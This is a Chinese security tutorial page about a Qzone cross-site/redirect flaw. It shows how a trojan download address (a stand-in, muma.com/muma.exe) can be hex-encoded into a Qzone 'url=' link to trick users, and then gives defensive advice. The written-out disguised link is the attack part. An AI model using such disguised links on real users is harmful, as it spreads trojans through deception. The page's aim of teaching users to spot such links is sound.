转至繁体中文版     | 网站首页 | 图文教程 | 资源下载 | 站长博客 | 图片素材 | 武汉seo | 武汉网站优化 | 
最新公告:     敏韬网|教学资源学习资料永久免费分享站!  [mintao  2008年9月2日]        
您现在的位置: 学习笔记 >> 图文教程 >> 网络应用 >> 网络安全 >> 正文
QQ安全防范与模拟QQ客攻击         ★★★★

QQ安全防范与模拟QQ客攻击

作者:闵涛 文章来源:闵涛的学习笔记 点击数:1356 更新时间:2009/6/9 2:36:38

        由于QQ在桌面IM领域占据着绝对霸主地位,在其身上衍生的各种产品也变得日益流行,而Qzone也逐渐成为网友书写日志和展示个性的地方。因此,Qzone的安全性也备受关注。不过,Qzone近日却爆出了一个跨站漏洞,这个漏洞非常容易被黑客利用。那么,黑客一般会如何通过这个漏洞来攻击普通用户呢?作为用户,我们又如何来防范这一漏洞的危害呢?

   一、模拟黑客攻击

   这里,我们首先来了解这个漏洞的具体情况。Qzone的跨站漏洞是网友无意中打开类似"http://user.qzone.qq.com/QQ号码?url=任意字母"时发现的,这时网页显示为一个框架网页,中间为"无法打开网页"的空白页面(如图1);然而,当输入类似"http://user.qzone.qq.com/QQ号码?url=http://www.baidu.com"的地址时却可以正常显示,这时url后的网址其实在幕后是加载的。那么,Qzone的跨站漏洞又是如何被黑客作为木马的媒介的呢?

   Qzone默认加载的地址要小心

   第一步:黑客需要对该地址进行乔装改扮一番。比如:网页木马的url为"http://www.muma.com/muma.exe"。黑客会使用URl加密技术来为木马地址作掩护,常用的方法是把url地址转换为16进制。

   黑客常用URL伪装器

   第二步:黑客将Qzone的地址设置为"http://user.qzone.qq.com/QQ号码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址来引诱网友点击,用户往往点击了该地址下载运行了木马还蒙在鼓里。

   二、如何防范Qzone攻击

   方法1:既然这一跨站漏洞这么隐蔽,用户感染的几率也不会低。我们需要如何来防范这一漏洞可能造成的危害呢?做到不感染病毒,未雨绸缪是最有效果的。因此,我们在访问网友的Qzone前,要多长几个心眼,要观察其网址的形式。

   一般正常的Qzone的地址是"http://user.qzone.qq.com/号码"或者"http://号码.qzone.qq.com/"形式的,如果出现"http://user.qzone.qq.com/QQ号码?url="的地址就要谨慎了,Qzone也可能出现类似"http://user.qzone.qq.com/号码/?url=http%3A//photo.qq.com/tips_jump.htm%23uin%3D号码%26albumid%3D393029702%26photoid%3D"的地址,如果地址里面完全没有QQ的地址段,那么为了防止下载运行网页木马,可以将url后的字符输入到ASCII码随心换软件进行地址转换(如果是像以上地址的格式,可以将%后的十六进制字符逐个进行转换来获得完整地址),如果url指向可执行文件就不能点击了。

   方法2:为了防止系统被种植网页木马,还可以安装杀毒软件和防火墙并需要开始实时文件和网络监控,这样即使下载了网页木马也会被清除。如果发现了可疑的Qzone地址要及时举报,让黑客成为过街老鼠,毫无藏身之处。

   小结:Qzone的跨站漏洞被用来种植木马具有受众广的特点,Qzone的地址经过加密化装后,又有几个人会仔细地进行甄别呢?因此,利用人们偷窥人家隐私空间的好奇心来传播木马是很有效果的。

   其实,要防范Qzone地址在你的电脑种植木马也不难,最简单的方法就是只点击QQ资料里的Qzone地址,不去其他网站点击就可以了。另外,需要使用具有防范IE漏洞的安全工具和杀毒软件来查杀这类木马的下载安装,如:瑞星卡卡。携带木马的Qzone地址一经发现要马上通知网友,决不姑息,不让其他人成为黑客的牺牲品。同时,每次Qzone提示升级我们也最好升级不用嫌麻烦而取消升级,以免被黑客利用其他未知的漏洞。


[网络安全]为什么利用防火墙和路由器很难解网络安全问题  [网络安全]如何让您的系统更加安全之十条建议
[网络安全]加强网络安全必经之路—修改注册表—网管必备  [网络安全]系统安全之分析网络入侵检测系统安全
[网络安全]Windows操作系统系列之安全防范之预防病毒的八个忠…  [网络安全]菜鸟学习—认识无线网络安全技术规范
[网络安全]五大网络安全工具  [网络安全]计算机网络安全知识十六项问答
[网络安全]计算机网络安全的六大目标  [网络安全]安全知识:堵住黑客非法入侵的11点重要基本原则
教程录入:mintao    责任编辑:mintao 
  • 上一篇教程:

  • 下一篇教程:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网]
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)

    同类栏目
    · QQ技巧  · 网络安全
    · 网络技术
    更多内容
    热门推荐 更多内容
  • 没有教程
  • 赞助链接
    更多内容
    闵涛博文 更多关于武汉SEO的内容
    500 - 内部服务器错误。

    500 - 内部服务器错误。

    您查找的资源存在问题,因而无法显示。

    | 设为首页 |加入收藏 | 联系站长 | 友情链接 | 版权申明 | 广告服务
    MinTao学以致用网

    Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved.
    闵涛 投放广告、内容合作请Q我! E_mail:admin@mintao.net(欢迎提供学习资源)

    站长:MinTao ICP备案号:鄂ICP备11006601号-18

    闵涛站盟:医药大全-武穴网A打造BCD……
    咸宁网络警察报警平台